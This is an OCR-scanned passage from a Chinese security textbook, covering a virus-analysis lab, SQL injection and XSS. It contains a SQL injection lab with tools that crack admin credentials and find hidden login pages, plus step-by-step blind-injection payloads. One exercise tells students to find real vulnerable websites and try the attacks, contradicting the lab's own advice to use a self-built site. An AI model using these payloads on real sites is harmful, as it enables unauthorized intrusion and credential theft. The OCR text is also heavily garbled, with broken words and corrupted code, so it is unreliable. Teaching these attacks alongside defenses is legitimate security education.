(3) 对 使 用 系统 端口 进行 比较 。 

将 虚拟 机 系统 还 原 至 纯净 快照 ,运行 CMD, 切 换 到 C 盘 根 目录 下 ,输入 netstat - an 放 
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netstatl. txt 命令 ,这 样 做 是 保存 纯净 系统 下 系统 所 开端 口 的 记录 。 之 后 运行 病毒 文件 ,再 
输入 netstat - an 二 netstat2. txt。 对 比 两 个 TXT 文档 的 变化 。 根 据 端 口 分 析 能 得 出 什么 
结论 ? 

(4) 用 SReng2 分 析 病 毒 样本 静态 行为 。 

再 次 将 虚拟 机 还 原 到 纯净 快照 处 ,打开 SReng2 , 单 击 左 侧 的 智能 扫描 功能 ,然后 开始 扫 
描 , 保 存 扫描 结果 。 在 运行 病毒 后 再 次 运行 SReng2 ,并 保存 扫描 结果 ,对 比 两 次 结果 并 进行 
分 析 。 

(5) 通过 Filemon 观察 病毒 的 操作 。 

由 于 new orz. exe 病毒 对 Filemon 进行 了 映像 劫持 ,所 以 需要 将 主 程序 名 更 改 一 下 方 
可 正常 运行 。 同 样 ,还 原 虚拟 机 至 纯净 快照 ,打开 Filemon, 将 过 滤 条 件 设置 为 new orz. 
exe, 然 后 运行 病毒 程序 。 注 意 观 察 文件 夹 C:\Documents and Settings\ Administrator\ 
Local Settings\ Temp。 

(6) OllyDBG 分 析 

还 原 虚 拟 机 系统 ,运行 PEID 对 new orz. exe 进行 查 过 ,其 使 用 的 是 什么 这? 脱 壳 之 后 
能 发 现 其 原 代码 是 用 什么 语言 编写 的 ? 

将 其 代码 载 人 OD, 查找 字符 串 , 结 合 对 new orz. exe 行为 的 分 析 检 查 其 创建 的 绿化 
. bat 和 修改 的 权限 ,病毒 有 没有 对 杀毒 软件 都 进行 了 映像 动 持 ?是 否 影响 了 任务 管理 器 ? 

(7) 通过 SSM 对 病毒 进行 动态 分 析 。 

与 Filemon 一 样 ,在 用 SSM 对 病毒 进行 动态 监控 时 ,也 需要 将 SSM 主 程序 更 改名 称 。 
最 后 一 次 将 系统 还 原 至 纯净 快照 ,安装 SSM., 并 将 系统 内 的 安全 进程 设 为 信任 。 再 次 运行 
病毒 ,进行 分 析 。 

实验 思考 : 

(1) 如 何 手工 对 orz. exe 病毒 进行 专 杀 ? 写 出 方法 和 清除 步 又。 

(2) 如 何 预防 orz. exe 病毒 ? 

7. 了 解 逆向 分 析 技术 原理 ,利用 实验 4-1( 或 实验 4-2) 受 害 端 可 执行 程序 的 木马 代码 文 
件 , 然 后 使 用 反 汇编 工具 进行 调试 分 析 。 
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第 5 章 Web 安全 技术 


Web 是 Internet 非常 重要 的 应 用 ,其 安全 问题 尤为 突出 。 本 章 详 述 Web 面临 的 主要 威 
胁 ,包括 SQL 注入 、 跨 站 脚本 攻击 、 网 页 挂 马 等 攻击 类 型 ,提出 一 些 防御 措施 ,并 介绍 了 网 站 
的 扫描 工具 。 


5.1 Web 安全 概述 


Web 站 点 的 安全 是 网 络 安全 技术 中 的 重要 领域 。 在 电子 商务 广泛 应 用 的 今天 ,黑客 不 
断 地 侵害 基于 Web 的 应 用 程序 ,以 获取 账户 信息 、 信 用 卡 和 其 他 机 密 数 据 。 黑 客 已 经 具备 
了 很 多 实施 攻击 的 技术 ,如 发 动 SQL 注入 式 攻击 、 跨 站 脚本 攻击 .目录 遍历 攻击 .身份 验证 
攻击 .目录 穷 举 和 其 他 的 漏洞 利用 。 这 些 和 人 侵 方 式 时 常 更 新 .并 被 用 于 传播 和 促进 对 Web 
应 用 程序 的 进一步 攻击 。 

Web 应 用 程序 ,例如 购物 车 、 表 单 、 登 录 页 面 .动态 内 容 和 其 他 预定 的 应 用 程序 ,这 些 都 
被 设计 为 允许 Web 站 点 的 访问 者 提交 各 种 个 人 数据 和 其 他 机 密 数 据 。 如 果 这 些 Web 应 用 
程序 不 安全 ,那么 数据 库 的 敏感 信息 就 会 处 于 严重 的 风险 之 中 。 

Web 的 安全 问题 , 究 其 产生 的 原因 有 以 下 几 个 方面 。 

(1) Web 站 点 和 相关 的 Web 应 用 程序 必须 保持 全 天 候 服务 ,使 用 者 包括 客户 、 供 应 
商 等 。 

(2) 由 于 对 Web 站 点 访问 必须 是 公开 的 , 且 其 应 用 程序 是 基于 HTTP(S) 的 应 用 层 协 
议 , 传 统 的 防火 墙 和 入 侵 检测 系统 是 从 网 络 层 保 护 Web 应 用 程序 ,不 能 很 好 地 为 基于 Web 
的 应 用 程序 提供 保护 。 

(3) Web 应 用 程序 经 常 拥有 对 客户 数据 库 等 后 端 数据 的 直接 访问 能 力 , 因 此 对 有 价值 
的 数据 保持 其 安全 性 的 难度 就 更 大 。 如 果 Web 应 用 程序 受到 了 破坏 ,那么 黑客 将 完全 可 以 
访问 后 端 数 据 , 即 使 防火 墙 配置 正确 ,操作 系统 和 应 用 程序 经 常 打 补 丁 ,也 难于 完全 抵御 此 
类 攻击 。 
(4) 多 数 Web 应 用 程序 属于 定制 程序 ,与 商业 软件 相 比 ,其 测试 程度 更 低 , 这 就 决定 了 
这 些 应 用 程序 更 易于 受到 攻击 。 

花样 百出 的 攻击 已 经 表明 Web 应 用 程序 的 安全 是 极为 关键 的 。 由 于 Web 攻击 是 在 
80 号 端口 上 发 动 的 ,而 该 端口 必须 保持 开放 以 便 网 站 的 访问 操作 ,这 就 注定 Web 攻击 防 不 
胜 防 。 

基于 Web 的 攻击 大 体 上 可 分 为 3 类 : SQL 注入 、 跨 站 脚本 攻击 、 网 页 挂 马 。 

(1) SQL 注入 : 利用 现 有 应 用 程序 ,通过 把 SQL 命令 插入 到 Web 表单 递交 或 页 面 请 
求 的 查询 字符 串 ,最终 达 到 欺骗 服务 器 执行 恶意 的 SQL 命令 ,比如 很 多 影视 网 站 的 VIP 会 
员 密 码 大 多 是 通过 Web 表单 递交 查询 字符 泄露 的 ,这 类 表单 特别 容易 受到 SQL 注入 式 
攻击 。 
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(2) 跨 站 脚本 攻击 : 指 利 用 网 站 漏洞 恶意 盗 取 用 户 信息 。 用 户 在 浏览 网 站 、 使 用 即时 
通信 和 软件 其 至 在 阅读 电子 邮件 时 ,通常 会 点 击 其 中 的 链接 。 攻 击 者 通过 在 链接 中 插入 恶意 
代码 ,就 能 够 盗 取 用 户 信息 。 

(3) 网 页 挂 马 : 把 一 个 木马 程序 上 传 到 一 个 网 站 ,然后 用 木马 生成 器 生成 一 个 网 马 , 再 
上 传 到 空间 里 面 ,加 入 代码 使 得 木马 在 打开 网 页 时 运行 。 

近年 来 , 随 着 Web 2.0 的 大 潮 , 越 来 越 多 的 人 开始 关注 Web 安全 ,新 的 Web 攻击 手法 
层出不穷 ,Web 应 用 程序 面临 的 安全 形势 日 益 严 峻 。 


5.2 SQL 注入 攻击 与 防范 


5.2.1 SQL 注入 攻击 


随 着 B/S 模式 的 广泛 应 用 ,使 用 这 种 模式 开发 应 用 程序 的 程序 员 也 越 来 越 多 ,但 相当 
多 的 开发 人 员 在 编写 代码 的 时 候 , 没 有 对 用 户 的 输入 数据 或 者 是 页 面 中 所 携带 的 信息 (如 
Cookie) 进 行 必要 的 合法 性 判断 ,导致 攻击 者 可 以 提交 一 段 数据 库 查 询 代码 ,根据 程序 返回 
的 结果 ,能 够 非法 获得 敏感 数据 。 

SQL 注入 利用 的 是 HTTP 服务 端口 ,表面 上 与 一 般 的 Web 页 面 访问 没有 区 别 ,隐蔽 性 
极 强 ,防火 墙 一 般 都 不 会 对 SQL 注入 发 出 警报 ,因而 不 易 被 发 现 。SQL 注入 攻击 是 黑客 对 
数据 库 进 行 攻击 的 常用 手段 之 一 。 

SQL 注入 攻击 过 程 一 般 分 为 5 个 步 又: 

第 一 步 : 判断 Web 环境 是 否 可 以 SQL 注入 。 如 果 URL 仅 是 对 网 页 的 访问 ,不 存在 
SQL 注入 问题 。 例 如 , 形 如 


http://news .unknown .com.cn/162414769961.shtml 


的 URL 就 是 普通 的 网 页 访问 ,没有 对 数据 库 查询 。 只 有 对 数据 库 进行 动态 查询 的 操作 才 
可 能 存在 SQL 注入 。 例 如 , 形 如 : 


http://wsw.google.cn/webhp? id= 39 


的 URL, 其 中 ?id=39 表示 数据 库 查询 变量 。 这 种 语句 会 在 数据 库 中 执行 ,因此 可 能 会 给 
数据 库 带 来 威胁 。 

第 二 步 : 寻找 SQL 注入 点 。 在 判定 可 注入 后 ,就 要 寻找 可 利用 的 注入 漏洞 。 通 过 输入 
一 些 特 殊 语 句 , 然 后 根据 浏览 器 返回 的 信息 可 以 判断 数据 库 类 型 ,找到 注入 点 。 

第 三 步 : 猜测 用 户 名 和 密码 。 数 据 库 中 存放 的 表 名 、 字 段 名 都 是 有 规律 可 循 的 。 通 过 
构建 特殊 数据 库 语句 在 数据 库 中 依次 查找 表 名 、 字 段 名 、 用 户 名 和 密码 的 长 度 以 及 内 容 。 这 
个 猜测 过 程 可 以 通过 网 上 大 量 注入 工具 快速 实现 ,并 借助 破解 网 站 轻易 破译 用 户 密码 。 

第 四 步 : 寻找 Web 管理 后 台 入 口 。 通 常 Web 后 台 管 理 权限 只 限于 管理 员 , 普 通用 户 
无 法 访问 。 要 寻找 到 后 台 的 登录 路 径 ,可 以 利用 扫描 工具 快速 搜索 到 可 能 的 登录 地 址 ,依次 
进行 尝试 ,往往 可 以 得 到 管理 台 的 入 口 地 址 ,获取 管理 员 权 限 。 

第 五 步 : 入 侵 。 成 功 登 录 后 台 管理 后 ,攻击 者 就 可 以 进行 一 些 蓄意 的 恶意 行为 ,如 算 改 
网 页 、 上 传 ASP 木马 、 修 改 用 户 信息 等 ,还 将 进一步 人 侵 数据 库 服务 器 。 由 于 在 服务 器 端 不 
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能 禁止 ASP 的 运行 ,因此 还 无 法 禁止 ASP 木马 的 运行 。 
这 个 过 程 如 图 5-1 所 示 。 
加 判断 Web 环 境 是 否 可 以 
已 SQL 注入 ， 寻 找 注 入 点 - 国 : @ 动态 查询 数据 库 - 国 
@ 构造 注入 语句 ， 和 程序 中 的 @ 获取 数据 ， 引 发 注入 攻击 
SQL 语 句 合成 新 的 SQL 语 句 
图 5-1 SQL 注入 攻击 过 程 


SQL 注入 式 攻 击 的 主要 形式 有 两 种 。 其 一 是 直接 将 代码 插入 ,与 原来 的 SQL 命令 串 
联 在 一 起 ,并 使 其 以 新 语句 执行 查询 。 由 于 是 直接 与 SQL 语句 捆绑 , 故 也 被 称 为 直接 注 人 
式 攻击 法 。 其 二 是 一 种 间接 的 攻击 方法 ,这 种 方法 将 恶意 代码 注入 要 在 表 中 存储 或 者 作为 
原始 数据 存储 的 字符 串 。 在 存储 的 字符 串 中 会 连接 到 一 个 动态 的 SQL 命令 中 ,以 执行 一 些 
恶意 的 SQL 代码 。 只 要 这 个 恶意 代码 符合 SQL 语句 的 规则 , 则 在 代码 编译 与 执行 的 时 候 
是 不 会 被 系统 所 发 现 的 。 

SQL 注入 漏洞 在 网 上 极为 普遍 ,通常 是 由 于 程序 员 对 注入 不 了 解 ,或 者 程序 过 滤 不 严 
格 ,或 者 某 个 参数 忘记 检查 导致 。SQL 注入 的 手法 相当 灵活 ,变种 极 多 。 在 注入 的 时 候 需 
要 构造 巧妙 的 SQL 语句 ,有 经 验 的 攻击 者 会 手动 调整 攻击 参数 ,致使 攻击 数据 的 变种 不 胜 
枚 举 。 传 统 的 特征 匹配 检测 方法 仅 能 识别 相当 少 的 攻击 ,难以 防范 。 


5.2.2 SQL 注入 式 攻击 防范 


SQL 注入 攻击 的 防范 可 从 下 面 几 个 方面 着 手 。 

(1) Web 服务 器 安全 配置 。 正 确 地 配置 Web 服务 器 可 以 降低 SQL 注入 发 生 的 风险 。 
具体 措施 包括 修改 服务 器 初始 配置 .及 时 安装 服务 器 安全 补丁 .关闭 服务 器 的 错误 提示 信 
息 、 配 置 目录 权限 、 删 除 危 险 的 服务 器 组 件 、 及 时 分 析 系 统 日 志 等 。 

(2) 数据 库 安全 配置 。 这 也 是 降低 SQL 注入 风险 的 方法 之 一 ,主要 包括 修改 数据 库 初 
始 配置 .及 时 升级 数据 库 、. 最 小 权力 法 则 等 。 

(3) 脚本 解析 器 安全 设置 。 主 要 配置 一 些 涉 及 安全 性 的 设置 ,通过 这 些 设置 可 以 增加 
SQL 的 注入 难度 。 

(4) 过 滤 特 殊 字符 。 通 过 Web 应 用 程序 对 用 户 输入 的 参数 进行 过 滤 , 使 得 参数 构造 的 
SQL 语句 不 能 送 达 数据 库 系统 执行 ,达到 降低 SQL 注入 攻击 风险 的 目的 。 

(5) 后 台 管 理 程序 。 不 要 在 网 页 上 显示 后 台 管 理 程序 的 入 口 链接 ,以 免 黑 客 攻 入 网 站 
后 台 管理 程序 。 管 理 员 的 用 户 名 和 密码 也 不 能 过 于 简单 ,注意 定期 更 换 。 建 议 平 时 删除 后 
台 管理 程序 ,维护 时 再 通过 FTP 上 传 ,然后 使 用 。 

实验 5-1 SQL 注入 攻击 实验 

【实验 目的 】 

了 解 SQL 注入 攻击 的 过 程 。 通 过 SQL 注入 攻击 ,掌握 网 站 的 工作 机 制 , 认 识 到 SQL 
注入 攻击 的 危害 ,加 强 对 Web 攻击 的 防范 。 

本 实验 不 可 对 他 人 网 站 造成 不 良 影响 。 建 议 自行 搭建 简易 网 站 进行 实验 。 

【实验 原理 】 

结构 化 查询 语言 (SQL) 是 一 种 用 来 和 数据 库 交互 的 文本 语言 ,SQL 注入 就 是 利用 某 些 
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数据 库 的 外 部 接口 把 用 户 数据 插入 到 实际 的 数据 库 操 作 语 言 当 中 ,从 而 达到 入 侵 数 据 库 乃 
至 操作 系统 的 目的 。 它 的 产生 主要 是 由 于 程序 对 用 户 输入 的 数据 没有 进行 细致 的 过 滤 , 导 
致 非法 数据 的 导入 查询 。 

在 下 面 的 攻击 实验 中 ,需要 用 到 wed. exe 和 wis. exe 两 个 命令 行 工 具 ( 从 网 络 上 下 载 )， 
其 中 wis. exe 用 于 扫描 某 个 站 点 中 是 否 存在 SQL 注入 漏洞 ; wed. exe 用 于 破解 SQL 注入 
用 户 名 和 密码 。 将 两 个 工具 结合 起 来 ,就 可 以 体验 从 寻找 注入 点 到 注入 攻击 完成 的 整个 
过 程 。 

【实验 过 程 】 

(1) 判断 环境 ,寻找 注入 点 。 

使 用 wis. exe 寻找 注入 漏洞 ,其 使 用 格式 为 


wis 网 址 


例如 ,检测 某 个 网 址 http://www. unknown. com/ ,首先 进入 命令 提示 窗口 ,然后 输入 
以 下 命令 : 


wis http://www .unknown.com/ 


按 回 车 键 , 即 可 开始 扫描 。 
注意 命令 格式 ,在 输入 网 址 时 ,网 址 需 放 在 http:// 和 /之 间 , 否 则 扫描 无 法 进行 。 
找到 的 有 SQL 注入 漏洞 的 网 站 是 
(2) 查看 SQL 注入 攻击 漏洞 。 
扫描 结束 后 ,可 以 看 到 网 站 上 是 否 存在 SQL 注入 攻击 漏洞 。 漏 洞 信息 一 般 以 红色 字体 
显示 ,以 SQL Injection Format 开头 的 那些 行 。 假 设 扫 描 后 其 中 某 行 如 下 : 


SQL Injection Format:/xygk.asp?typeid= 34&bigclassid= 98 


这 是 特征 明显 的 数据 库 查询 语句 ,可 以 选择 其 来 做 破解 用 户 名 和 密码 实验 。 如 果 要 将 其 网 
页 打开 ,可 在 浏览 器 地 址 栏 中 输入 完整 网 址 : 


http://www.unknown.com/xygk. asp?typeid= 34&bigclassid= 98 


扫描 结果 是 

其 中 的 漏洞 信息 是 

(3) SQL 注入 破解 管理 员 账 号 。 

使 用 wed. exe 破解 管理 员 账 号 ,其 使 用 格式 为 
wed 网 址 


进入 命令 提示 窗口 ,输入 以 下 命令 : 


wed http://www .unknown.com/xygk.asp? typeid= 34&gbigclassid= 98asp? 
回 车 后 查看 运行 情况 。 
注意 输入 网 址 时 最 后 面 不 要 加 上 符号 /, 但 前 面 的 http:// 不 可 缺少 。 
该 程序 在 运行 时 使 用 了 破解 用 户 数 据 库 中 的 字 表 名 、 用 户 名 和 用 户 密码 所 需 的 字典 文 
件 ,如 TableName. dic、UserField. dic 和 PassField. dic。 
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在 破解 过 程 中 还 可 以 看 到 “SQL Injection Detected. ”的 字符 串 字样 ,表示 程序 还 会 对 需 
要 注 人 破解 的 网 站 进行 检测 ,以 确定 是 否 存在 SQL 注入 漏洞 成功 后 才 开 始 猜测 用 户 名 。 

如 果 检 测 成 功 ,很 快 就 获得 了 数据 库 表 名 ,例如 admin; 然 后 得 到 用 户 表 名 和 字 长 ,例如 
为 username 和 6; 再 检测 到 密码 表 名 和 字 长 ,例如 为 password 和 8。 系 统 继续 执行 , wed. 
exe 程序 开始 用 户 名 和 密码 的 破解 ,最 终 获得 了 用 户 名 和 密码 。 


破解 结果 是 
如 果 不 能 破解 ,其 原因 是 


(4) 搜索 隐藏 的 管理 登录 页 面 。 

重新 回 到 (1) 打 开 的 网 站 页 面 中 ,用 已 经 检测 到 的 管理 员 的 账号 和 密码 进入 管理 登录 页 
面 ,但 当前 的 页 面 中 还 没有 管理 员 的 入 口 链接 。 

再 次 使 用 wis. exe 程序 ,该 程序 除了 可 以 扫描 出 网 站 中 存在 的 所 有 SQL 注入 点 外 ,还 
可 以 找到 隐藏 的 管理 员 登 录 页 面 。 在 命令 行 窗口 中 输入 


wis http://www .unknown.com/xygk.asp? typeid= 34&bigclassid= 98/a 


注意 行 末 输 入 了 一 个 参数 /a。 
如 果 出 现 扫描 不 成 功 的 情况 ,可 以 认为 管理 员 登 录 页 面 只 可 能 隐藏 在 整个 网 站 的 某 个 
路 径 下 。 于 是 输入 


wis http://www.unknown.com /a 


对 整个 网 站 的 登录 页 面 进行 扫描 。 注 意 扫 描 语句 中 网 址 的 格式 。 在 扫描 过 程 中 ,如 找到 隐 
藏 登录 页 面 ,会 在 屏幕 上 以 红色 字体 进行 显示 。 

扫描 结束 后 ,结果 以 列表 形式 显示 在 命令 窗口 中 。 一 般 可 以 看 到 列表 中 有 多 个 以 /rsc/ 
开头 的 管理 员 登 录 页 面 网 址 ,例如 /rsc/gl/manage. asp、/rsc/gl/login. asp、/rsc/gl/adminl. 
asp 等 。 任 意 选 择 一 个 网 址 ,比如 在 浏览 器 中 输入 网 址 http://www. unknown. com/ rsc/ 
gl/adminl. asp, 就 会 出 现 本 来 隐藏 着 的 管理 员 登 录 页 面 。 输 入 用 户 名 和 密码 ,就 可 以 进入 
后 台 管 理 系 统 。 

搜索 到 的 隐藏 的 管理 员 登 录 页 面 是 

如 果 搜 索 不 到 ,其 原因 是 

【实验 思考 】 

(1) 本 实验 是 借助 工具 软件 实现 的 。 如 果 不 使 用 这 些 工 具 , 也 可 通过 地 址 栏 进行 攻击 。 
地 址 栏 攻击 通常 就 是 采用 猜测 的 方法 。 在 下 面 讨 论 中 请 写 出 可 能 的 SQL 语句 原型 。 

可 注入 的 站 点 一 般 都 有 ""&.request 这 种 漏洞 ,其 攻击 方法 主要 有 下 面 几 个 。 

a 在 地 址 栏 输入 and 1 王 1。 

可 能 的 SQL 语句 原型 : 5 

此 操作 是 查看 漏洞 是 否 存在 。 如 果 存 在 ,就 正常 返回 该 页 ;如果 不 存在 , 则 显示 错误 , 继 
续 假设 该 网 站 的 数据 库存 在 一 个 admin 表 。 

@ 在 地 址 栏 输入 and 0 二 二 (select count( * ) from admin)。 

可 能 的 SQL 语句 原型 : Ys 

若 返回 页 正常 ,假设 就 成 立 了 。 
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@ 猜 猜 管理 员 表 里 面 有 几 个 管理 员 ID: 
and 1< (Select count (* ) from admin) 
可 能 的 SQL 语句 原型 : ( 
如 果 执 行 查询 后 页 面 没有 什么 显示 , 则 管理 员 的 数量 等 于 或 者 小 于 1 个 。 
然后 尝试 
and 1= (select count (* )from admin) 
输入 为 1 没有 显示 错误 ,说 明 此 站 点 只 有 一 个 管理 员 。 


可 能 的 SQL 语句 原型 :( 
@ 猜测 admin 里 面 关 于 管理 员 用 户 名 和 密码 的 字段 名 称 : 


and 1= (Select count (* ) from admin where len (username)> 0) 


可 能 的 SQL 语句 原型 :( 
如 果 猜 测 错误 , 则 说 明 不 存在 username 这 个 字段 。 只 要 一 直 改 变 括号 是 


Ws 
且 面 的 


username 这 个 字段 ,例如 常用 的 有 user、 users、member、members、 userlist、memberlist、 


userinfo ,admin .manager 等 用 户 名 。 
@@ 用 户 名 称 字段 猜测 完成 之 后 ,继续 猜测 密码 字段 : 


and 1= (select count (* ) from admin where len (Password)> 0) 


可 能 的 SQL 语句 原型 : 


站 


pore ee 因为 密码 字段 一 般 都 是 这 个 形式 。 如 果 不 是 ,可 尝试 其 


他 形式 ,如 pass 等 。 
据 此 ,已 经 知道 了 管理 员 表 里 面 有 3 个 字段 : 编号 id、 用 户 名 user、 密 码 passwor 
下 面 继续 猜测 管理 员 用 户 名 和 密码 。 
先 猜 出 长 度 : 


and 1= (select count (* ) from admin where len (user)<10) 
user 字段 长 度 小 于 10。 
and 1= (select count (* ) from admin where len (user)< 5) 


user 字段 长 度 不 小 于 5 
最 后 猜 出 长 度 ( 例 如 等 于 6)。 下 面 的 语句 如 返回 正常 就 说 明 猜 测 正确 : 


and 1= (select count (* ) from admin where len (user)= 6) 
猜 密码 : 
and 1= (select count (* )from admin where len (password)= 10) 


猜 出 来 密码 为 10 位 。 
下 面 逐 一 猜 字母 。 


and 1= (Select count (* ) from admin where left (user,1)=a) 
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d。 


返回 正常 ,第 一 位 字符 等 于 a, 注意 大 小 字母 写 敏感 。 如 果 不 是 a 就 继续 猜 其 他 的 字 
符 , 直 至 猜 到 返回 正常 。 然 后 开始 猜测 账号 的 第 二 位 字符 : 


and 1= (select count (* ) from admin where left (user,2)=ad) 


就 这 样 一 次 加 一 个 字符 ,最 后 账号 就 全 猜 出 来 了 。 
密码 也 以 类 似 方法 猜测 : 


and 1= (select count (* ) from admin where left (password, 1)=a) 


最 后 也 猜 出 密码 。 

要 求 : 查找 可 以 进行 地 址 栏 攻击 的 网 站 ,用 上 述 手段 进行 尝试 。 

(2) 破解 网 站 时 ,如 果 表 名 列 名 猜 不 到 ,或 程序 作者 过 滤 了 一 些 特殊 字符 ,怎么 提高 注 
入 的 成 功率 ? 怎么 样 提 高 猜 解 效率 ? 

(3) 请 讨论 防御 SQL 注入 攻击 的 有 效 方法 ,并 加 以 实验 验证 。 


5.3 XSS 攻击 与 防范 


5.3.1 XSS 漏洞 


用 户 在 浏览 网 站 时 ,通常 会 点 击 其 中 的 链接 。 攻 击 者 通过 在 链接 中 插入 恶意 HTML 
代码 , 当 用 户 浏览 该 网 页 时 , 艇 入 其 中 的 HTML 代码 就 会 被 执行 ,从 而 达到 恶意 用 户 的 特 
殊 目 的 。 这 些 攻击 往往 发 生 在 动态 网 站 中 , 称 为 跨 站 脚本 攻击 。 

跨 站 脚本 攻击 (Cross Site Scripting,XSS) 是 Web 应 用 程序 在 将 数据 输出 到 网 页 时 存 
在 的 问题 ,攻击 者 利用 页 面 的 漏洞 构造 恶意 代码 。 因 为 跨 站 脚本 攻击 都 是 向 网 页 内 容 中 写 
和 一段 恶意 的 脚本 或 者 HTML 代码 , 故 跨 站 脚本 漏洞 也 被 叫 作 HTML 漏洞 注入 (HTML 
injection)。XSS 跨 站 脚本 攻击 一 直 都 被 认为 是 客户 端 Web 安全 中 最 主流 的 攻击 方式 。 因 
为 Web 环境 的 复杂 性 以 及 XSS 跨 站 脚本 攻击 的 多 变性 ,使 得 该 类 型 攻击 即使 发 现 也 很 难 
彻底 解决 。 

与 SQL 注入 攻击 数据 库 服 务 器 的 方式 不 同 , 跨 站 脚本 漏洞 是 在 客户 端 造成 攻击 。 也 就 
是 说 ,利用 跨 站 脚本 漏洞 注入 的 恶意 代码 是 在 用 户 计算 机 上 的 浏览 器 中 运行 的 ,对 用 户 信息 
造成 巨大 的 危害 。 最 典型 的 场景 是 ,黑客 可 以 利用 跨 站 脚本 漏洞 盗 取 用 户 Cookie 而 得 到 用 
户 在 该 站 点 的 身份 权限 。 

由 于 恶意 代码 会 注入 到 浏览 器 中 执行 ,所 以 跨 站 脚本 漏洞 还 有 一 个 较为 严重 的 安全 威 
胁 是 被 黑客 用 来 制造 欺诈 页 面 实现 钓鱼 攻击 。 这 种 攻击 方式 直接 利用 目标 网 站 的 漏洞 , 比 
直接 做 一 个 假冒 网 站 更 具 欺 骗 性 。 

另外 ,由 于 控制 了 用 户 的 浏览 器 ,黑客 还 可 以 获取 用 户 计算 机 信息 ,截获 用 户 键盘 输入 ， 
刺探 用 户 所 处 局 域 网 信息 甚至 对 其 他 网 站 进行 HTTP GET Flood 攻击 ( 即 HTTP 流量 攻 
击 )。 目 前 互联 网 已 经 有 此 类 利用 跨 站 脚本 漏洞 控制 用 户 浏览 器 的 黑客 工具 出 现 。 

虽然 跨 站 脚本 攻击 是 在 客户 端 浏览 器 进行 的 ,但 是 最 终 也 是 可 以 攻击 服务 器 的 。 例 如 ， 
利用 某 博 客 程序 的 跨 站 脚本 漏洞 得 到 网 站 管理 员 身 份 并 最 终 控 制 Web 服务 器 。 

最 典型 的 HTML 注入 范例 只 是 注入 一 个 JavaScript 弹出 式 的 警告 框 。 
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下 面 是 一 段 PHP 代码 (以 test. php 文件 保存 ): 


< 

echo " 畴 ,".$_GET['name']7 

这 段 PHP 代码 的 意图 是 在 页 面 输出 字符 串 " 哮 ,” 和 URL 中 name 参数 的 值 。 例 如 通 
过 浏览 器 访问 这 个 文件 : 


http://localhost/test .php?name= 李 娜 


页 面 上 就 会 出 现 “ 哮 ,李娜 ”字样 。 其 中 “李娜 ”是 通过 URL 中 的 参数 name 传人 的 ,name 的 
值 就 是 用 户 的 输入 。 

浏览 器 对 网 页 的 展现 是 通过 解析 HTML 代码 实现 的 ,如 果 传 人 的 参数 含有 HTML 代 
人 码 , 浏 览 器 则 会 解析 这 些 代码 而 不 是 只 作为 参数 简单 显示 。 

为 了 简单 起 见 ,将 上 面 例子 的 参数 作 如 下 改变 ,然后 访问 刚才 的 PHP 页面: 


http://localhost/test.php?name=<script>alert (/ 嗨 ,我 是 李娜 )< /script> 


将 看 到 name 后 面 的 “ 值 ?被 浏览 器 作为 HTML 标记 解释 了 。 

这 实际 上 是 最 简单 的 一 种 跨 站 脚本 攻击 的 例子 ,其 形式 属于 反射 型 XSS。 可 以 设想 ， 
如 果 传 人 一 段 攻击 脚本 放置 在 二 script 二 标签 之 后 ,该 脚本 也 将 会 被 浏览 器 执行 ,其 攻击 的 
性 质 就 由 脚本 的 内 容 决定 了 。 

由 此 可 见 , Web 应 用 程序 在 处 理 用 户 输入 的 时 候 没 有 处 理 好 传人 的 数据 格式 就 会 导致 
脚本 在 浏览 器 中 执行 ,这 就 是 跨 站 脚本 漏洞 的 根源 。 

注意 ,PHP 文件 是 一 种 HTML 内 髋 式 的 语言 脚本 文件 ,是 一 种 在 服务 器 端 执 行 的 风 入 
HTML 文档 的 脚本 语言 ,在 HTML 文件 中 ,PHP 脚本 程序 可 以 使 用 特别 的 PHP 标签 进行 
引用 ,这 样 网 页 制作 者 也 不 必 完 全 依赖 HTML 生成 网 页 。 由 于 PHP 是 在 服务 器 端 执行 
的 ,客户 端 是 看 不 到 PHP 代码 的 。PHP 文件 不 能 简单 地 在 浏览 器 中 打开 ,需要 安装 xampp 
(Apache) ,将 其 放 在 htdocs 文件 夹 下 。 


5.3.2 XSS 漏洞 分 类 


XSS 攻击 有 内 跨 站 和 外 跨 站 两 种 方式 。 内 跨 站 (来 自 自身 的 攻击 ) 主 要 是 利用 程序 自 
身 的 漏洞 构造 跨 站 语句 。 外 跨 站 (来 自 外 部 的 攻击 ) 主 要 是 自己 构造 有 跨 站 漏洞 的 网 页 或 者 
寻找 非 目标 机 以 外 的 有 跨 站 漏洞 的 网 页 。 例 如 , 当 要 渗透 一 个 站 点 ,可 以 自己 构造 一 个 有 跨 
站 漏洞 的 网 页 ,然后 构造 跨 站 语句 ,通过 结合 其 他 技术 ,如 社会 工程 学 等 ,欺骗 目标 服务 器 的 
管理 员 打 开 该 网 页 。 

根据 XSS 跨 站 脚本 攻击 存在 的 形式 及 产生 的 效果 ,可 以 将 其 分 为 以 下 3 类 。 

1. 非 持久 型 XSS 

非 持 久 型 XSS(non-persistent XSS) 又 称 反 射 XSS(reflect XSS) ,反射 型 XSS 脚本 攻击 
指 那些 浏览 器 每 次 都 要 在 参数 中 提交 亚 意 数据 才能 触发 的 跨 站 脚本 漏洞 。 该 类 型 只 是 简单 
地 将 用 户 输入 的 数据 直接 或 未 经 过 安全 过 滤 就 在 浏览 器 中 进行 输出 ,导致 输出 的 数据 中 存 
在 可 被 浏览 器 执行 的 代码 数据 。 由 于 此 种 类 型 的 跨 站 代码 存在 于 URL 中 ,所 以 黑客 通常 
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需要 通过 诱骗 或 加 密 变 形 等 方式 将 存在 恶意 代码 的 链接 发 给 用 户 , 只 有 用 户 点 击 以 后 才能 
使 得 攻击 成 功 实施 。 

一 般 来 说 ,凡是 通过 URL 传人 恶意 数据 的 都 是 非 持 久 型 XSS。 当 然 , 也 有 的 是 通过 表 
单 POST 的 XSS。 例 如 : 


< ?PHP 

echo " 嗨 ,".$_POST['name']; 

Fs 

Web 应 用 程序 获取 的 参数 name 已 经 由 GET 变 为 POST 了 ,如 果 要 触发 这 个 XSS 漏 
洞 ,需要 写 一 个 如 下 的 网 页 : 

< form action= "http://localhost/test.php" method= "post"> 

< input name= "name" value= "< script>alert ( 猜 猜 我 是 谁 ?)< /script>" type= "hidden" /> 

< input name= "ss" type= "submit" value= "XSS 提交 测试 " /> 

< /form> 


网 页 运行 后 , 单 击 “XSS 提交 测试 ?按钮 ,可 以 看 到 浏览 器 弹出 的 对 话 框 。 

2. 持久 型 XSS 

持久 型 XSS(persistent XSS) 又 称 存 储 XSS(stored XSS) 。 与 非 持 久 型 XSS 相反 , 它 是 
